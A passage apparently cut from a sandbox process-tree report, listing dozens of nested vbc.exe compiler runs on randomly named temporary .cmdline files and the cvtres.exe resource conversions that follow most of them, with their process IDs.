        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5F0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC5EF.tmp"
        6⤵
        
        PID:852
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\g7kalpx9.cmdline"
        5⤵
        
        PID:2164
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\_tqjngpd.cmdline"
        5⤵
        
        PID:2532
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC69B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC69A.tmp"
        6⤵
        
        PID:2672
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\juxiqxou.cmdline"
        5⤵
        
        PID:268
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC68C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC67B.tmp"
        6⤵
        
        PID:1656
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hrs7kyvs.cmdline"
        5⤵
        
        PID:2040
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC776.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC775.tmp"
        6⤵
        
        PID:2436
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3argxilt.cmdline"
        5⤵
        
        PID:1008
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-alfs2zn.cmdline"
        5⤵
        
        PID:992
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC802.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC801.tmp"
        6⤵
        
        PID:1984
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vzb4-vob.cmdline"
        5⤵
        
        PID:1680
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC831.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC830.tmp"
        6⤵
        
        PID:2984
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\r0yuyezn.cmdline"
        5⤵
        
        PID:1580
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC89E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC89D.tmp"
        6⤵
        
        PID:2944
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ftvcunq6.cmdline"
        5⤵
        
        PID:604
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC8BD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC8BC.tmp"
        6⤵
        
        PID:1388
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\v-un6ykm.cmdline"
        5⤵
        
        PID:2596
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\f85cuwuy.cmdline"
        5⤵
        
        PID:2628
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA34.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCA23.tmp"
        6⤵
        
        PID:432
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\uintkkje.cmdline"
        5⤵
        
        PID:1736
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA14.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCA13.tmp"
        6⤵
        
        PID:1900
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\iipa8b1n.cmdline"
        5⤵
        
        PID:2056
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCAD0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCACF.tmp"
        6⤵
        
        PID:2672
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ruaygjlh.cmdline"
        5⤵
        
        PID:1564
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCB0E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCB0D.tmp"
        6⤵
        
        PID:2140
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\jxw3fo7n.cmdline"
        5⤵
        
        PID:1948
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gzbz_j55.cmdline"
        5⤵
        
        PID:2080
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCBC9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCBC8.tmp"
        6⤵
        
        PID:2040
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\o2lrzx3e.cmdline"
        5⤵
        
        PID:896
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCBE8.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCBE7.tmp"
        6⤵
        
        PID:2756
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fyquj_es.cmdline"
        5⤵
        
        PID:992
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC94.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCC93.tmp"
        6⤵
        
        PID:1620
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wlkcsr0p.cmdline"
        5⤵
        
        PID:2092
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCCD2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCCD1.tmp"
        6⤵
        
        PID:2868
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pirkzuu3.cmdline"
        5⤵
        
        PID:2520
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD4F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCD4E.tmp"
        6⤵
        
        PID:788
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\miaus0ny.cmdline"
        5⤵
        
        PID:2604
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD7E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCD7D.tmp"
        6⤵
        
        PID:2544
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kxlvng-v.cmdline"
        5⤵
        
        PID:2996
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wb-gn9zq.cmdline"
        5⤵
        
        PID:2976
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dzmam1he.cmdline"
        5⤵
        
        PID:264
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD03C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD03B.tmp"
        6⤵
        
        PID:1660
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lsrh4h-t.cmdline"
        5⤵
        
        PID:1672
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hoi7rtb_.cmdline"
        5⤵
        
        PID:1300
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD2BC.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD2BB.tmp"
        6⤵
        
        PID:2040
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\okiwkijw.cmdline"
        5⤵
        
        PID:896
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ldbwy4mh.cmdline"
        5⤵
        
        PID:1056
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\jegictl6.cmdline"
        5⤵
        
        PID:1384
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD50C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD50B.tmp"
        6⤵
        
        PID:588
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gan0pu0q.cmdline"
        5⤵
        
        PID:816
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD5F6.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD5F5.tmp"
        6⤵
        
        PID:1388
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lu6iuqr2.cmdline"
        5⤵
        
        PID:2944
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD72E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD72D.tmp"
        6⤵
        
        PID:2940
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ken0qz1c.cmdline"
        5⤵
        
        PID:852
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mjliocwl.cmdline"
        5⤵
        
        PID:1488
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD950.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD94F.tmp"
        6⤵
        
        PID:2976
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\y1p-97dv.cmdline"
        5⤵
        
        PID:1652
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA98.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDA97.tmp"
        6⤵
        
        PID:1656
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ub8qsm4j.cmdline"
        5⤵
        
        PID:1548
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDBEF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDBEE.tmp"
        6⤵
        
        PID:2924
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\eh6h4wmf.cmdline"
        5⤵
        
        PID:2276
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD37.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDD36.tmp"
        6⤵
        
        PID:2360
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\aubhp5qs.cmdline"
        5⤵
        
        PID:2968
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE7E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDE7D.tmp"
        6⤵
        
        PID:2320
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\iqi-9u8_.cmdline"
        5⤵
        
        PID:2584
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\teblgb6y.cmdline"
        5⤵
        
        PID:1464
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\veakpukz.cmdline"
        5⤵
        
        PID:2540
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ifb63gfi.cmdline"
        5⤵
        
        PID:788
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bc-1jnq3.cmdline"
        5⤵
        
        PID:2944
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE265.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE264.tmp"
        6⤵
        
        PID:1952
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hqecaf6w.cmdline"
        5⤵
        
        PID:1588
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE36E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE35D.tmp"
        6⤵
        
        PID:2732
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hhhjdjn6.cmdline"
        5⤵
        
        PID:1864
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ifye5kca.cmdline"
        5⤵
        
        PID:2772
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ceroli4v.cmdline"
        5⤵
        
        PID:1548
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3nyuy9g1.cmdline"
        5⤵
        
        PID:2812
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE84E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE84D.tmp"
        6⤵
        
        PID:2860
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rnfyqfei.cmdline"
        5⤵
        
        PID:2968
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9D4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE9D3.tmp"
        6⤵
        
        PID:1156
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bfdrxnjy.cmdline"
        5⤵
        
        PID:2868
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kmnepglr.cmdline"
        5⤵
        
        PID:2692
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dv3aqmt9.cmdline"
        5⤵
        
        PID:2552
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fh5zrofx.cmdline"
        5⤵
        
        PID:2996
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ldqx8flv.cmdline"
        5⤵
        
        PID:2956
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pbjfy0kp.cmdline"
        5⤵
        
        PID:2220
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEE76.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEE75.tmp"
        6⤵
        
        PID:2736
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kqfvb6ot.cmdline"
        5⤵
        
        PID:1864
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEF9E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEF9D.tmp"
        6⤵
        
        PID:2932
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kyjr-dhe.cmdline"
        5⤵
        
        PID:2856
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zic6bbc2.cmdline"
        5⤵
        
        PID:2556
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\y_lrvhzu.cmdline"
        5⤵
        
        PID:740
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lprwcjhm.cmdline"
        5⤵
        
        PID:2432
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF308.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF2F7.tmp"
        6⤵
        
        PID:912
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nios0me8.cmdline"
        5⤵
        
        PID:3016
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF4EB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF4DB.tmp"
        6⤵
        
        PID:2632
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yifup4-z.cmdline"
        5⤵
        
        PID:2092
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\a1lh2hof.cmdline"
        5⤵
        
        PID:2820
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
